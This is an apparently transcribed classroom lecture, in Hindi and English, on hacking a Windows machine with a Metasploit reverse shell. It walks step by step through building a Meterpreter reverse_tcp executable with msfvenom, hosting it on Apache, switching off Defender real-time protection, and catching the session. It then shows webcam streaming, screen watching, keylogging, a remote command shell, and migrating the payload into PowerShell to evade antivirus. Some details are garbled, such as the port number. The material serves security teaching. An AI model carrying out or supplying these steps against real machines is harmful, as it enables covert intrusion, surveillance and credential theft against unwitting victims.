Reverse shell is basically a thing where we use this particular script to hack a corresponding system, nothing else. Okay. So how to use with the script, how we can actually connect this script to the Windows machine basically, how we can actually hack a Windows machine through a script. That is what we are going to start with. Okay. So I'm going to first share a notes of mine so that you can be able to copy those, or else at least you can be able to take a screenshot of it. So पहले मैं आपको अपने notes share कर दूँगा, that will be much easier, right? So उसके साथ आगे बढ़ते हैं आप लोग, give me 2 minutes. These are some notes we can follow. These are some notes which we have created. ठीक है, इसमें से कुछ आज हम लोग फॉलो करने वाले हैं. जैसे कि हम लोग सबसे पहले exe payload create करने वाले हैं. We are going to create an exe payload today. We are going to learn how this exe payload can be further exploited. Basically, what I mean by exploitation is basically how we can keep it hidden, right? How we can make it hidden basically. So whenever we hack a system, we normally look after these payloads, that how these payloads can go undetected. Now normally at the first stance I have told you that this payload cannot go undetected because anti-malware systems knows about this vulnerability. ठीक है, इसके बारे में सभी के सभी anti-malware systems जानते हैं कि एक vulnerability है. That is the reason we cannot bypass anti-malware system using these exploits. कल जो हम लोग देखेंगे वो हम लोग देखने वाले हैं कि किस तरीके से एंटी मालवेयर सिस्टम को बाईपास करना है. बट फिर भी अगेन, कैन आई यूज द सेम पेलोड टू बाईपास एंटी मालवेयर सिस्टम? द आंसर इज यस. हाउ वी कैन डू दैट? सो फर्दर एक्सप्लोरेशंस कैन बी सीन. फर्स्ट ऑफ ऑल वी हैव टू क्रिएट अ पेलोड. सो दोज हु डोंट नो अबाउट मेटास्प्लॉइट, अंडरस्टैंड दिस वेरी क्लियरली. आई होप यू मस्ट बी नोइंग अबाउट कोर इम्पैक्ट. Those who belong from cybersecurity, they must be knowing about Core Impact. That is a commercial version of Metasploit. Metasploit is a community version, you can say. It is a free of cost version. So we will see how it works, and we'll also see how to deliver the same thing. Okay. First of all, this is the payload. I will request everyone, please take a screenshot of this, or else what I can do best is I can go to my Kali machine. Okay, so I can paste it here and you can be able to see. Okay, I'll go with super SU, which is super user. So I'll have a super user privileges. And let me paste the payload. Okay, let me copy it again. Yeah, so we are talking about this payload specifically. Okay, you can see we have pasted it. Due to some reasons, maybe there are some problems. Yes. Okay, so this is the payload. Let me increase the screen size. Screen size. Okay, so I need you guys to please copy this payload, else please type this payload in your notepad as soon as possible. I am increasing the screen once again. Please type this payload inside your notepad as soon as possible, because tomorrow you have to demonstrate this. That's the reason I am telling you. Please go and type this inside your notepads. Yeah, you can start that. Yes, the host and L-port. The second one, okay? आप लोगों को ये वाला कमांड लिखना है।
कौन सा?
ये वाला जो मैंने सिलेक्ट किया है। MSF Venom -P space Windows / interpreter / reverse_tc. Okay, so _tcp space lhost. Lhost will be listening host. Now what is listening host is? जहाँ पे हम लोग कनेक्शन सुनने वाले हैं, राइट, उसको लिसनिंग होस्ट बोलते हैं, where we are going to intercept the connection. That is one thing. Then we have L port. Obviously our IT systems are based out of ports. How many ports do we have? Anyone? How many total ports do we have? कितना? 6,000. Wrong answer. Anyone? Total ports, guys. Even BCA should know this. 65,000 something. Okay. For एकदम perfect आंकड़ा बता एकदम correct figure. What is the correct figure? It is 65,535. Right? Now this ports can be used in n numbers of ways. ठीक है? First 1,000 ports are used for specifically communications. Major communications in TCP are used for first 1,000. Afterwards we can see 2,000 से लेके 65,535 तक हम लोग कोई भी पोर्ट यूज कर सकते हैं। जैसे पोर्ट नंबर 80 हो गया, वो HTTP के लिए यूज होता है। पोर्ट नंबर 443 HTTPS. I hope you all know about this basic ports information, right? So we're going to learn this how it works. Basically, first of all, at very first we can see here we have to give the IP address information, port information. Plus we have file extension name which is exe. I hope everyone knows exe works in Windows, right? Like if I ask you Android, what is the file extension for Android? Anyone knows what is the file extension for Android? APK, not APK, right? Great. So this is the way basically we are going to create a method like payload first of all, which can be executed inside the Windows system. So at very first, we're going to we can say add here the IP address. For that, I'll first check my IP address for Kali system. Why I am adding Kali system's IP address? Because of I have to listen the communication on Kali Linux. That's the reason. Okay. So you can see my IP address for Kali system is 172.20.10.4. Now where do I have to make the changes? You can see here. Specifically, I am going to the host portion. I will delete this portion and I will add my IP address. You don't have to add anything else here. I am going to add my IP address, which is 172.20.10.4. 172.20.10.4. This is my IP address, correct? This is my Kali system IP address. Again, why I am giving this IP address? Because I have to intercept the communication. From wherever the communication is coming, I will be intercepting it on my Kali Linux. That is the reason. Then the port number. Now again, which port number am I going to use? Again, not necessary. You can use any port number. Right now I am going to use 44224444. We can use whatever port numbers we have to use. You can use. Okay. Now you can see -o file name. Whatever file name you like, you can give. Right now I am going to give -o space. I will give /var/html/uu.exe. Okay, Gogranchal-university.exe. So let's understand what I am trying to do here is why. Anyone knows? By the way, why I have given /var/www/html? Why is this folder? Why? What is the reason I have given this folder? Anyone? किसी को पता है ये फोल्डर क्यों दिया मैंने? सॉरी, लोकेशन है किसकी? ओके, ये Apache server की लोकेशन है specifically. If I say this is an Apache server's location /var/www/html is an Apache server's location. Okay, so you can again put your file here so that I can send this file over a wireless medium. I guess right now somebody asked me a question. हम लोग किस तरीके से सेशन कुकी को एक जगह से दूसरी जगह भेज सकते हैं? From computer 1 to computer 2 or computer A to computer B. So you can also use Apache servers for sharing the files and resources. So by default in Kali machines we get Apache. So we are going to use this exploit. We are just going to hit enter. After hitting enter, you can see. Okay, yeah. So my payload is created here. We can see the payload size is 73,802 bytes. Okay, and it is saved in var www.html uu.exe. It means I can now download this payload from whichever section I want to. In the sense, let's say if I am right now in US, my victim is in US, I am right now in India, and if I have to hack a person who is sitting in US, so that is possible. Why? Because I am using Apache servers. There is two types of possibilities. We have to go with local variant. Like there are two types of IP addresses. One is intranet, second is extranet. Right? So we also need a static IP address in case we have to do that thing. Now understanding the first thing, सबसे पहले क्या करना पड़ेगा? पेलोड को बना लिया हम लोगों ने. पेलोड बन चुका हमारा. इसको हम लोगों को विंडोज सिस्टम में डालना है. Obviously विंडोज सिस्टम हमारा विक्टिम मशीन है. So विंडोज मशीन के अंदर हम लोग इसको कैसे इंसर्ट कर सकते हैं वो एक अलग टास्क है. उसके ऊपर हम लोग यहाँ पे देखेंगे कि किस तरीके से ये एक मशीन एक्सेस करता है उस सिस्टम को. पर उससे पहले I will again demonstrate how this thing is going to work. Okay. Very first we will go to Kali machine again. एक प्रोसेस करना पड़ेगा आप सबको. What it is? We have to start Apache server. How to start Apache server? It's very easy. You have to type service Apache 2 start. This is the command you have to enter. The moment you will type this command, you have to check whether it is on or not. You have to give status, and you can see it is active running, right? So that is what we needed. Now Apache is running. Yeah, Apache service Apache 2 start. We can we can give start in runtime status. Okay, so we can give this command. Apache 2 start. Here is the command. The moment you will give start, the Apache service will get started. Now what you have to understand is what is your IP address. So we have already seen the IP addresses 172.20.10.4. Obviously विंडो वाला जो भी होगा उसके अंदर हम लोग ये IP एड्रेस डालेंगे 172.20.10.4/uu.exe. You can see यहाँ पे uu.exe वाली फाइल इंस्टॉल होना स्टार्ट हो चुकी है. यहाँ पे मैं इसको कीप पे क्लिक करता हूँ. ठीक है, क्लिक ऑन कीप. लेट्स सी. ठीक है, इसने यहाँ पे इस फाइल को इंस्टॉल कर लिया. We have installed this file here, and yes, the moment we have installed it, real time protection जो मैंने आप लोगों को बोला था, this is the one thing जिसके लिए कोई भी पेन टेस्टर काम नहीं कर सकता इसके साथ. ये रियल टाइम प्रोटेक्शन माइक्रोसॉफ्ट विंडोज के अंदर बाय डिफॉल्ट आता है. आप लोग सोचते हो ना कि हम लोग QKit इंस्टॉल करते हैं या मैकअफी इंस्टॉल करते हैं अननेसेसरीली. वर्ल्ड के टॉप 10 एंटी मैलवेयर सिस्टम्स के अंदर एक नाम है जिसका नाम है माइक्रोसॉफ्ट का रियल टाइम प्रोटेक्शन. राइट. सो रियल टाइम प्रोटेक्शन को अगर हम लोगों को ऑब्वियसली बात है इस प्रैक्टिकल के लिए हम लोगों को उसको डिसेबल करना पड़ेगा. कल के प्रैक्टिकल में आप लोग देखोगे कि हम लोग कैसे बाईपास करेंगे इसको. ठीक है, बट लेट्स से इफ यू हैव टू डिसेबल रियल टाइम प्रोटेक्शन यू हैव टू गो इन वायरस एंड थ्रेट प्रोटेक्शन settings. You have to scroll down and you can go in manage settings and you can stop real time protection. That's it. The moment you will stop this, I will again going to hit enter here, and now this time it will have no problem because the real time is not working. I'll go to downloads. You can see this one is not deleted. राइट. अब यहाँ पे जाके इसको एक्सेस करते हैं हम लोग. उससे पहले हम लोगों को कॉन्फ़िगर करना है पेलोड को. दैट इज आल्सो नेसेसरी. दिस शुड मूव इन करेक्ट. गिव मी 1 minute guys. Okay, let's see what's the issue. Okay. Now, how to configure this? We again have the, we don't have to worry, we have the notes we can follow, right? So notes के अंदर चले जाएंगे वापस से, and we will configure our Metasploit payload, right? We will clear this. At very first, we have to enter in Metasploit, okay? क्योंकि Metasploit का payload तो बना दिया MSF Venom को use करके. There are two types of agent. एक हो गया MSF Venom जिससे payload बनता है. दूसरा हो गया Metasploit. जिससे हम लोगों को कनेक्शन मिलता है. I guess we can go into Metasploit in different sections also. You can see here in the notes. We have to use -q methods also. So MSF console can be helpful for us. So Metasploit का दूसरा नाम हम लोग console बोलते हैं वहाँ पे, where we can able to take console of meter shells. So वापस से हम लोग चले जाएंगे यहाँ पे MSF console. Hit enter. We are inside Metasploit console. We can see there are 2,437 exploits we have access of. So ये Windows system पे भी उससे ज़्यादा exploits हम लोगों को provide करता है. उसमें से सिर्फ एक try कर रहे हैं अभी हम लोग. There is only one exploit which we are trying right now. They have more than 2,000 exploits. We can see 1,255 auxiliaries, 1,468 payloads, encoders, multiple things. Evasion techniques. Right now we are following on some another thing right now. So let's go and let's see what is the next step. We have to use this particular thing, which is use exploit multi-handler. Why multi-handler? Because we can connect multiple systems at a time. ये जो uu.exe करके exploit करना है ना हम लोगों ने, वो हम लोग अलग-अलग systems में डाल सकते हैं. We can communicate more than 10 systems at a time. 10 systems के साथ एक साथ हम लोग communicate कर सकते हैं. That is one thing. So कोई भी hacker जब आपके system को attack करता है तो इसी तरीके से होता है. So let's see. Enter here. We can see right now we are at multi-handler, right? Let's go with the next one now. The next one tells us to set the payload. Next command is set payload. इसको हम लोग पेस्ट कर देते हैं यहाँ पे. Okay, so हम लोगों ने जब payload बनाया था, when we have created the payload, at that time which payload we have chosen? We have chosen Windows Meterpreter Reverse TCP, if you remember. So I am only choosing the same payload basically to configure that, right? So we can hit enter here and we can see here we have successfully set the payload, right? The next one will be set lhost and lport. We can see here the same one, IP addresses and the port number. So same thing, even I am going to set it here. Set lhost, which is 172. You can see here, this is the IP address 172.20.10.4. 172.20.10.4. Enter. This is set lport, which is port number. The same thing which we have configured at MSF Venom side. So basically, MSF Venom is a payload generator. MSF console is a console taker of that payload. We can say. Here we will give the same port number again. Hit enter, and you just have to type exploit. That's it. The moment you will type exploit, बेसिकली इसको ऐसा बोला जाता है कि हम लोग जैसे एक्सप्लॉइट टाइप करते हैं, यहाँ पे जिसने भी वो चीज इंस्टॉल की होगी हमारा uu.exe वाला पेलोड, उसके साथ में हम लोग एक रिवर्स कम्युनिकेशन स्टार्ट कर रहे हैं. Started reverse TCP handle on 172.20.10.4, right, on 4444. मतलब क्या? मतलब अभी अगर वो विंडोज क्लाइंट जो हम लोग विक्टिम बोल रहे हैं जिसको, उसने अगर जाके वो एप्लीकेशन एग्जीक्यूट कर दी नॉर्मली इस तरीके से, so what will happen? We can see here. Okay. There is one difference यहाँ पर आप लोग देख सकते हैं हम लोगों को कोई IP address मिला है which is the range of APIPA, right? You can check. There is some problem in this. कुछ तो दिक्कत हुआ है इसकी वजह से ऐसा हुआ है, right? Let me check. What is the problem? We were disconnected, that's the reason. Okay, now we are connected again. So let's see. Let's go to Windows. Command prompt. IP config. It shows the IP address. You can confirm here. Let's go to Kali Linux. IP config. It shows the IP address. Correct. It is working. Let me go to Windows and we will execute the command. Okay. Okay, we got the connection. Basically, I guess internet connections की वजह से issues हो रहे थे हमारे. But we can see यहाँ पे हम लोगों को एक session connected मिल चुका है जो मीटर लिख के हम लोगों को session दिख रहा है. By the way, होता क्या है मैं आपको बता देता हूँ. So whenever we install this uu.exe or whatever the payload got created, ठीक है? उसको सिर्फ one time initiation करना होता है. After that initiation, the installation process starts. जैसे आप normal application कैसे install करते हो? That kind of process gets started here. Okay. The moment you give yes, आपका एक connection establish होगा with your Kali Linux, and that connection has been established here. Same. Right? You can see Kali VM. The same connection has been established here. We can use PWD. We can understand where this particular like exploit is working. So we can see ये जो exploit है वो कहाँ पे काम कर रहा है. We can see here it is working in shared folders downloads. Right? So we have kept it in downloads. We can also see one more thing. Let's say if I have to specifically go and access, let's say there are multiple things in my Windows system. ठीक है? तो चलो कुछ access करना है कैसे कर सकते हैं? क्या चीजें available है? I can type help. I hope everyone can see it. So in this see this here. Help लिखने से हम लोगों को जितने भी options है Metasploit provide करता है वो सारे के सारे options available है. Again all these options are available. You just have to type help. You can see whatever options are available. It will be listed here. Immediately you will be able to see, you can easily access webcam. You can see webcam chat. You can actually stream webcam. In the sense, आपका जो सामने वाला victim है, whomsoever is the victim, you can access his webcam. You can live stream the victim's webcam. In the sense, you can see him in live. First thing, we also have record mic option available. Right? We have multiple options. Set desktop. We have screenshot. We have screen share. Screen share is again, we can say again very bad thing, right? So normally just type screen share, and you can see, sorry, yeah, and you can see यहाँ से बैठे बैठे मैं देख पाऊंगा विंडोज एजेंट क्या कर रहा है. मेरे काली लिनक्स में से मुझे दिख रहा है कि विंडोज में क्या चल रहा है सिस्टम में. So it can be again I'm telling you. out of the country, it can be inside the country, inside the local area network, doesn't matter. We can see each and everything कि हमारा victim क्या कर रहा है. Windows के अंदर अभी फिलहाल क्या है कि ये स्क्रीन ओपन है. हम लोग Windows के अंदर जाके वेरीफाई भी कर सकते हैं. You can go, you can see in Windows हम लोग इसी स्क्रीन पे अवेलेबल है. If we go on desktop तो उधर काले लिनक्स में भी चेंज हो जाएगा क्योंकि लाइव स्ट्रीमिंग हो रही है. मैं देख पा रहा हूँ वहां से विंडोज एजेंट क्या क्या कर पा रहा है. So I go in Kali Linux and I can again see the changes made. You can click on Kali Linux and you can see right now it is on desktop. So I can see this complete thing in real time. That is the best thing. So hackers have multiple access of this kind of thing. Again, there are another things also. So we are going to exit this one. Okay, we are going to cancel this. Okay, we have next. I guess I have spoken of key scan, keystrokes, keylogger attack, right? We are all on keylogger. What is keylogger is? So you can see, in case if you have to access keylogger, you can also go and start keyscan underscore start. This is the basically you can say this is the command. Okay, you can go and you can paste this command, hit enter, and we can see starting the keystroke sniffer. In the sense, now whatsoever that Windows agent is going to type in Notepad, in WhatsApp, in browser, wherever it is, that whole things will be delivered here. Okay, each and everything will be delivered here. So how it will be seen again? We are going to go in. Let's go to the Windows system. यहाँ पे ओपन करते हैं हम लोग एक नोटपैड फाइल. ओके, I go with नोटपैड. नोटपैड में लिखते हैं hello. Okay, this is my message. अब मैंने कई सारा कीबोर्ड पे टाइप किया, राइट? ये इंफॉर्मेशन देनी चाहिए मुझको सामने वाले करस्पॉन्डेंट काली मशीन पे. क्या अटैकर ने ये चीज नोटिस की? Let's go in काली मशीन. We will have to type keyscan underscore dump dump. You can see victim ने जो लिखा वो भी दिख रहा है. It means कीबोर्ड से जो टाइप किया victim ने वो भी दिखा हम लोगों को. That we type hello good afternoon. And then we can see that capital में क्या इसके अंदर shift press करके you होगा टाइप किया. That is also one thing which you can see. So each and everything will be captured here. That's again not a good thing, right? So इसके वजह से हम लोग आप लोगों को इसके प्रिवेंशन मेथोडोलॉजीज बताएंगे. But there are multiple things which you can see here. Suspend कर सकते हो, screen open, shut down कर सकते हो यहाँ से सिस्टम को. आप देख सकते हो यहाँ पे क्या क्या चल रहा है. रिबूट कर सकते हो, कोई भी प्रोसेस को चालू या बंद कर सकते हो. और ये तो हो गया लाइक एक गिमिकी प्रोडक्ट है. एज पर पेन टेस्टर या जितना एक्सपीरियंस हम लोग होल्ड करते हैं ये सारी चीजें फर्स्ट लेवल पे आती है. ये सारी चीजें बेसिक मतलब स्टेज 1 पे. इफ वी टॉक अबाउट हायर लेवल्स हम लोग एन्यूमरेट करते हैं विद इन फायरवॉल्स, विद इन एंटी मालवेयर सिस्टम्स. देयर आर मल्टीपल थिंग्स. तो इसकी वजह से अभी हम लोग आगे वो भी समझेंगे कि कैसे होती है ये सारी चीजें. बट यस, टॉकिंग अबाउट दिस थिंग, इट्स लाइक अंडरस्टैंडिंग. कल आप लोगों को जो वर्कशॉप एक टास्क दे रहा हूँ आज के दिन में मैं आप लोगों को, मुझे भी देखना है कि आप लोग कितना इंटरेस्टेड हो इसके आगे देखने के लिए. हाउ वी कैन से ऑब्फ्यूस्केट दिस. ऑब्फ्यूस्केट इन द सेंस कैसे हम लोग इसको छुपा सकते हैं. फिलहाल हम लोगों ने देखा हम लोगों ने रियल टाइम प्रोटेक्शन रख किया तभी जाके ये चालू हुआ, राइट? क्या उसके सिवा कोई दूसरा ऑप्शन है? there is an option. I can give you a small hint today. You can use that hint basically. Basically we can we have one specific command which I can show you. So it's basically like this. You can see. You have to type shell. And जैसे मैंने shell टाइप किया मेरे को क्या मिला आप देख सकते हो. मैं काले लिनक्स के अंदर विंडोज कमांड प्रॉम्प्ट का एक्सेस लेके बैठा हूँ. ठीक है, मतलब अभी मेरे पास इसका एक्सेस है. I have the access of Windows command prompt, right, in the Kali Linux. If I type ipconfig also, I will get the IP address of Windows machine, correct? Windows machine IP address can be seen here, right? Yeah, here is the IP address. This is the one, correct? So we can see each and everything is basically we can handle it from here, from itself, Kali itself, right? So there is a way. I would like to give you one hint actually. There is one Microsoft's own application. एक खुद का application है Microsoft का जिसके अंदर ये vulnerability है. There is a vulnerability in Microsoft's own application. You can migrate this payload with that particular application. Migration means what? क्या करें आज देखिए कैसे होता है migration. छोटा सा रहेगा 5 मिनट का ही है. So we will try to see how the migration happens. कल के दिन में ऑफिस पेश करेंगे, ठीक है? So migration basically हम लोग कैसे करते हैं? Like आपको एक टास्क को जवाब देता हूँ. You can go like this. We can go to the Windows system. Now ये टास्क आपका रहेगा. मैं यहाँ पे मैन्युअली जाके PowerShell चालू कर रहा हूँ. Now how many of you know about PowerShell? PowerShell के बारे में जानता है कोई यहाँ पे? यूज करते हो आप लोग PowerShell को? चलो ठीक है. PowerShell को जो लोग यूज करते हैं वो काफी हेल्पफुल है. मैं बता देना चाहता हूँ इंडस्ट्री के अंदर इसके ऊपर काफी काम चल रहा है. वी कैन सी PowerShell मैंने यहाँ पे स्टार्ट किया है, राइट? आई हैव स्टार्टेड PowerShell here. Understand this very clearly. If a hacker gets PowerShell running in your system, he can migrate himself in PowerShell. कैसे? मैं दिखा देता हूँ. I'll exit this. I'll again come to meter. I'll type PS, which means process list. It means it will going to show me the PowerShell process. Okay, process ID of PowerShell. Why I need process ID of PowerShell? You can see here. Give me 1 minute. I will show you. You have to first search for PowerShell. Okay. So I'm trying to see here PowerShell's process ID. You can see Chrome.exe, runtime Docker, Chrome. There are multiple ones. We have to specifically search for PowerShell. Here it is, right? This is PowerShell. We have detected PowerShell's process ID. Process ID is 4988. What I will do is, I will migrate uu.exe into PowerShell. It's basically 4988. Hit enter. And this is the vulnerability. PowerShell accepts vulnerable applications to migrate. That is the problem. ये सक्सेसफुल नहीं होना चाहिए. अगर PowerShell सेफ होता तो ये सक्सेसफुल नहीं होता है. और क्योंकि ये अभी सक्सेसफुल है, अगर विक्टिम जाके अपना रियल टाइम प्रोटेक्शन ऑन भी करना चाहे तो वो कर सकता है. दैट इज नॉट अ प्रॉब्लम फॉर हिम नाउ. यहाँ पे हम लोग जाके वी कैन स्टार्ट रियल टाइम प्रोटेक्शन एंड द एंटी मालवेयर सिस्टम इज नाउ वर्किंग. So if the anti-malware system is working, our payload should get crashed, right? Delete हो जाना चाहिए. But because we are now PowerShell, you can see we are still working. अभी भी हम लोग काम कर रहे हैं. It means we have successfully bypassed anti-malware system. Now what is your task is basically? So your task is you have to find out a way. जैसे हम लोगों ने यहाँ पे देखा, मैं यहाँ से Windows system में गया, PowerShell open किया. You have to find out a way. आप Meterpreter में से ही PowerShell को open करो. Record it. There should be a command, right? I'm giving you this task. If you crack this task, obviously I'm going to give you something good. So yeah, that is coming up later on. But yes, this is the task. You have to open PowerShell from your Meterpreter shell. Okay? You don't have to go in Windows and separately open PowerShell. That is how it is. So that is about the Meterpreter, the Metasploits, basically communication, whatever we are seeing right now, right? You can see our communication is still working. If the connection was discontinued, we can see